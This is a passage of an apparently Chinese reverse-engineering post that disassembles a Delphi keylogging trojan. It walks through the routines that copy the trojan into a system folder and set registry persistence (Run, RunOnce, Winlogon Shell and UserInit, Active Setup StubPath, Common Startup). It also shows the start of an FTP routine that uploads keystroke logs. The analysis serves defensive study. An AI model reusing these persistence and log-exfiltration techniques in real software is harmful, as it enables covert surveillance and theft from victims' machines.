CODE:00433837
cmp byte ptr [
ebx+2], 1
CODE:0043383B
jnz short loc_433849
CODE:0043383B
CODE:0043383D
mov eax,
ds:off_4360F0
CODE:00433842
mov eax, [
eax]
; 解码后配置文件中的“{4fz8rk-15aq-16nc-23or4-2ke0fa051515}”字串送EAX
CODE:00433844
call _Create_Component_RegKey
CODE:00433844
CODE:00433849
CODE:00433849 loc_433849:
; CODE XREF: _Set_Reg_Info+DFj
CODE:00433849
cmp byte ptr [
ebx+3], 1
CODE:0043384D
jnz short loc_43385B
CODE:0043384D
CODE:0043384F
mov eax,
ds:off_436044
CODE:00433854
mov eax, [
eax]
; 这里为解码后配置文件中的字串 pschost
CODE:00433856
call _Create_Dir_and_CopyFile
CODE:00433856
CODE:0043385B
CODE:0043385B loc_43385B:
; CODE XREF: _Set_Reg_Info+F1j
CODE:0043385B
cmp byte ptr [
ebx+4], 1
CODE:0043385F
jnz short loc_433866
CODE:0043385F
CODE:00433861
call _Create_Winlogon_RegKey
CODE:00433861
CODE:00433866
CODE:00433866 loc_433866:
; CODE XREF: _Set_Reg_Info+103j
CODE:00433866
cmp byte ptr [
ebx+5], 1
CODE:0043386A
jnz short loc_433871
CODE:0043386A
CODE:0043386C
call _Create_Winlogon_Shell_RegKey
CODE:0043386C
CODE:00433871
CODE:00433871 loc_433871:
; CODE XREF: _Set_Reg_Info+10Ej
CODE:00433871
xor eax,
eax
CODE:00433873
pop edx
CODE:00433874
pop ecx
CODE:00433875
pop ecx
CODE:00433876
mov fs:[
eax],
edx
CODE:00433879
push offset loc_433893
CODE:00433879
CODE:0043387E
CODE:0043387E loc_43387E:
; CODE XREF: _Set_Reg_Info+135j
CODE:0043387E
lea eax, [
ebp+var_14]
CODE:00433881
mov edx, 5
CODE:00433886
call System::__linkproc__ LStrArrayClr(void *,
int)
CODE:00433886
CODE:0043388B
retn
CODE:0043388B
CODE:0043388C
; ---------------------------------------------------------------------------
CODE:0043388C
CODE:0043388C loc_43388C:
; DATA XREF: _Set_Reg_Info+14o
CODE:0043388C
jmp unknown_libname_48
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:0043388C
CODE:00433891
; ---------------------------------------------------------------------------
CODE:00433891
jmp short loc_43387E
CODE:00433891
CODE:00433893
; ---------------------------------------------------------------------------
CODE:00433893
CODE:00433893 loc_433893:
; CODE XREF: _Set_Reg_Info+12Fj
CODE:00433893
; DATA XREF: _Set_Reg_Info+11Do
CODE:00433893
pop ebx
CODE:00433894
mov esp,
ebp
CODE:00433896
pop ebp
CODE:00433897
retn
CODE:00433897
CODE:00433897 _Set_Reg_Info
endp
其中的
CODE:00433856
call _Create_Dir_and_CopyFile
是用来创建文件的。到这个
CALL 里看看:
CODE:00414C34 _Create_Dir_and_CopyFile
proc near
; CODE XREF: _Set_Reg_Info+FAp
CODE:00414C34
CODE:00414C34 var_20 =
dword ptr -20h
CODE:00414C34 var_1C =
dword ptr -1Ch
CODE:00414C34 var_18 =
dword ptr -18h
CODE:00414C34 var_14 =
dword ptr -14h
CODE:00414C34 var_10 =
dword ptr -10h
CODE:00414C34 var_C =
dword ptr -0Ch
CODE:00414C34 var_8 =
dword ptr -8
CODE:00414C34 var_4 =
dword ptr -4
CODE:00414C34
CODE:00414C34
push ebp
CODE:00414C35
mov ebp,
esp
CODE:00414C37
xor ecx,
ecx
CODE:00414C39
push ecx
CODE:00414C3A
push ecx
CODE:00414C3B
push ecx
CODE:00414C3C
push ecx
CODE:00414C3D
push ecx
CODE:00414C3E
push ecx
CODE:00414C3F
push ecx
CODE:00414C40
push ecx
CODE:00414C41
mov [
ebp+var_4],
eax
CODE:00414C44
mov eax, [
ebp+var_4]
CODE:00414C47
call System::__linkproc__ LStrAddRef(void *)
CODE:00414C47
CODE:00414C4C
xor eax,
eax
CODE:00414C4E
push ebp
CODE:00414C4F
push offset loc_414D35
CODE:00414C54
push dword ptr fs:[
eax]
CODE:00414C57
mov fs:[
eax],
esp
CODE:00414C5A
lea eax, [
ebp+var_C]
CODE:00414C5D
call _Get_System_Dir
CODE:00414C5D
CODE:00414C62
push [
ebp+var_C]
CODE:00414C65
push offset asc_414D48
; "\\"
CODE:00414C6A
push [
ebp+var_4]
CODE:00414C6D
lea eax, [
ebp+var_8]
CODE:00414C70
mov edx, 3
CODE:00414C75
call System::__linkproc__ LStrCatN(void)
CODE:00414C75
CODE:00414C7A
mov eax, [
ebp+var_8]
CODE:00414C7D
call Sysutils::DirectoryExists(System::AnsiString)
CODE:00414C7D
CODE:00414C82
test al,
al
CODE:00414C84
jnz short loc_414C96
CODE:00414C84
CODE:00414C86
push 0
; lpSecurityAttributes
CODE:00414C88
mov eax, [
ebp+var_8]
CODE:00414C8B
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00414C8B
CODE:00414C90
push eax ; lpPathName
CODE:00414C91
call CreateDirectoryA
; 在系统目录下创建 pschost 目录,如 C:\WINDOWS\system32\pschost
CODE:00414C91
CODE:00414C96
CODE:00414C96 loc_414C96:
; CODE XREF: _Create_Dir_and_CopyFile+50j
CODE:00414C96
lea eax, [
ebp+var_10]
CODE:00414C99
mov ecx,
offset s->Copia_exe
; "\\copia.exe"
CODE:00414C9E
mov edx, [
ebp+var_8]
CODE:00414CA1
call System::__linkproc__ LStrCat3(void)
CODE:00414CA1
CODE:00414CA6
mov eax, [
ebp+var_10]
CODE:00414CA9
call Sysutils::FileExists(System::AnsiString)
CODE:00414CA9
CODE:00414CAE
test al,
al
CODE:00414CB0
jnz short loc_414D02
CODE:00414CB0
CODE:00414CB2
push 0
; bFailIfExists
CODE:00414CB4
push [
ebp+var_8]
CODE:00414CB7
push offset asc_414D48
; "\\"
CODE:00414CBC
lea edx, [
ebp+var_1C]
CODE:00414CBF
xor eax,
eax
CODE:00414CC1
call System::ParamStr(
int)
CODE:00414CC1
CODE:00414CC6
mov eax, [
ebp+var_1C]
CODE:00414CC9
lea edx, [
ebp+var_18]
CODE:00414CCC
call Sysutils::ExtractFileName(System::AnsiString)
CODE:00414CCC
CODE:00414CD1
push [
ebp+var_18]
CODE:00414CD4
lea eax, [
ebp+var_14]
CODE:00414CD7
mov edx, 3
CODE:00414CDC
call System::__linkproc__ LStrCatN(void)
CODE:00414CDC
CODE:00414CE1
mov eax, [
ebp+var_14]
CODE:00414CE4
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00414CE4
CODE:00414CE9
push eax ; lpNewFileName
CODE:00414CEA
lea edx, [
ebp+var_20]
CODE:00414CED
xor eax,
eax
CODE:00414CEF
call System::ParamStr(
int)
CODE:00414CEF
CODE:00414CF4
mov eax, [
ebp+var_20]
CODE:00414CF7
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00414CF7
CODE:00414CFC
push eax ; lpExistingFileName
CODE:00414CFD
call CopyFileA
; 木马文件复制到新建的系统目录下的 pschost 目录中
CODE:00414CFD
CODE:00414D02
CODE:00414D02 loc_414D02:
; CODE XREF: _Create_Dir_and_CopyFile+7Cj
CODE:00414D02
mov eax, [
ebp+var_8]
CODE:00414D05
push eax
CODE:00414D06
mov ecx,
offset s->CommonStartup
; "Common Startup"
CODE:00414D0B
mov edx,
offset s->SoftwareMicrosoftWindowsCurrentversionExplorerUserShellFo
; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:00414D10
mov eax, HKEY_LOCAL_MACHINE
CODE:00414D15
call _Create_RegKey
; 把 HKEY_LOCAL_MACHINE\SOFTWARE
CODE:00414D15
; \Microsoft\Windows\CurrentVersion\Explorer
CODE:00414D15
; \User Shell Folders 的项 Common Startup
CODE:00414D15
; 键值改为以上新建的目录
CODE:00414D15
CODE:00414D1A
xor eax,
eax
CODE:00414D1C
pop edx
CODE:00414D1D
pop ecx
CODE:00414D1E
pop ecx
CODE:00414D1F
mov fs:[
eax],
edx
CODE:00414D22
push offset loc_414D3C
CODE:00414D22
CODE:00414D27
CODE:00414D27 loc_414D27:
; CODE XREF: _Create_Dir_and_CopyFile+106j
CODE:00414D27
lea eax, [
ebp+var_20]
CODE:00414D2A
mov edx, 8
CODE:00414D2F
call System::__linkproc__ LStrArrayClr(void *,
int)
CODE:00414D2F
CODE:00414D34
retn
CODE:00414D34
CODE:00414D35
; ---------------------------------------------------------------------------
CODE:00414D35
CODE:00414D35 loc_414D35:
; DATA XREF: _Create_Dir_and_CopyFile+1Bo
CODE:00414D35
jmp unknown_libname_48
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00414D35
CODE:00414D3A
; ---------------------------------------------------------------------------
CODE:00414D3A
jmp short loc_414D27
CODE:00414D3A
CODE:00414D3C
; ---------------------------------------------------------------------------
CODE:00414D3C
CODE:00414D3C loc_414D3C:
; CODE XREF: _Create_Dir_and_CopyFile+100j
CODE:00414D3C
; DATA XREF: _Create_Dir_and_CopyFile+EEo
CODE:00414D3C
mov esp,
ebp
CODE:00414D3E
pop ebp
CODE:00414D3F
retn
CODE:00414D3F
CODE:00414D3F _Create_Dir_and_CopyFile
endp
经过以上处理,会在注册表中作如下设置:
1、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 下创建 SCISound 项,键值为路径加木马文件名,带参数 /lanzateRunOnce
2、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 下的 Shell 项中添加木马文件路径+文件名
3、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 添加 svchost 项,键值为木马文件路径+文件名
4、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components 下创建项 {4fz8rk-15aq-16nc-23or4-2ke0fa051515},再在
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{4fz8rk-15aq-16nc-23or4-2ke0fa051515} 下创建项 StubPath,键值为木马路径加文件名,带参数 /lanzateActiveX
6、如果在系统目录(如 C:\WINDOWS\system32) 下创建了 pschost 目录,则把
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup 的键值改为以上新建的目录
7、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 下的 UserInit 项中添加木马路径+文件名的键值
----------------------------------------------------------------------------------------------------------
四、键盘记录
键盘记录的我就不贴代码了,比较长。无非就是设定时器,扫描键盘,再生成记录文件。
最后还有个连接 FTP 的,会在 FTP 里创建 iklogs 目录,上传你机器上生成的记录,这里略过:
CODE:00432D30 _FTP_Work
proc near
; DATA XREF: CODE:00431264o
CODE:00432D30
CODE:00432D30 var_178 =
dword ptr -178h
CODE:00432D30 var_174 =
dword ptr -174h
CODE:00432D30 var_170 =
dword ptr -170h
CODE:00432D30 var_16C =
dword ptr -16Ch
CODE:00432D30 var_168 =
dword ptr -168h
CODE:00432D30 var_164 =
dword ptr -164h
CODE:00432D30 var_160 =
byte ptr -160h
CODE:00432D30 var_154 =
dword ptr -154h
CODE:00432D30 var_8 =
dword ptr -8
CODE:00432D30 var_4 =
dword ptr -4
CODE:00432D30
CODE:00432D30
push ebp
CODE:00432D31
mov ebp,
esp
CODE:00432D33
add esp, 0FFFFFE88h
CODE:00432D39
push ebx
CODE:00432D3A
push esi
CODE:00432D3B
push edi
CODE:00432D3C
xor edx,
edx
CODE:00432D3E
mov [
ebp+var_178],
edx
CODE:00432D44
mov [
ebp+var_174],
edx
CODE:00432D4A
mov [
ebp+var_170],
edx
CODE:00432D50
mov [
ebp+var_16C],
edx
CODE:00432D56
mov [
ebp+var_168],
edx
CODE:00432D5C
mov [
ebp+var_164],
edx
CODE:00432D62
mov [
ebp+var_4],
edx
CODE:00432D65
mov [
ebp+var_8],
edx
CODE:00432D68
lea eax, [
ebp+var_160]
CODE:00432D6E
mov edx, off_406540
CODE:00432D74
call unknown_libname_68
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00432D74
CODE:00432D79
xor eax,
eax
CODE:00432D7B
push ebp
CODE:00432D7C
push offset loc_433129
CODE:00432D81
push dword ptr fs:[
eax]
CODE:00432D84
mov fs:[
eax],
esp
CODE:00432D87
mov ds:byte_437A3C, 1
CODE:00432D8E
push 0
CODE:00432D90
push 0
CODE:00432D92
push 0
CODE:00432D94
push 1
CODE:00432D96
push offset s->Iexplore
; "iexplore"
CODE:00432D9B
call InternetOpenA
--------------------------------------------------------------------------------
【版权声明】: 本文纯属技术交流, 转载请注明作者并保持文章的完整, 谢谢!
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课